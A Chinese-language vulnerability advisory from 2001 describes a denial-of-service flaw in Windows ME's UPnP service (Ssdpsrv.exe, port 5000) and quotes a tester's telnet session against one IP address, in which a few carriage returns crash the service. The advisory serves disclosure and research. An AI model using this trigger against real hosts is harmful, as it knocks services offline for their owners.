安全研究
安全漏洞
WindowsME Ssdpsrv.exe 拒绝服务漏洞
发布日期:2001-10-18
更新日期:2001-10-19
受影响系统:
Microsoft WindowsME
描述:
Ssdpsrv.exe是WindowsME上提供UPnP服务的程序,该服务是每次开机自动启动的,默认
端口是5000。
该服务存在安全漏洞,通过连接该端口并输入3到5个回车,就可以导致该服务崩溃,只有重新启
动才能恢复正常功能。
<*来源:milo omega (
mtwoar@hotmail.com)
参考:
http://archives.neohapsis.com/archives/bugtraq/2001-10/0133.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
milo omega (
mtwoar@hotmail.com)提供了如下测试方法:
<snip>
bash-2.05$ telnet 165.121.234.217 5000
Trying 165.121.234.217...
Connected to 165.121.234.217.
Escape character is '^]'.
HTTP/1.1 400 Bad Request
Connection closed by foreign host.
bash-2.05$
</snap>
错误信息为:
Ssdpsrv has caused an error in MSVCRT.DLL.
Ssdpsrv will now close.
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.microsoft.com/
浏览次数:3873
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |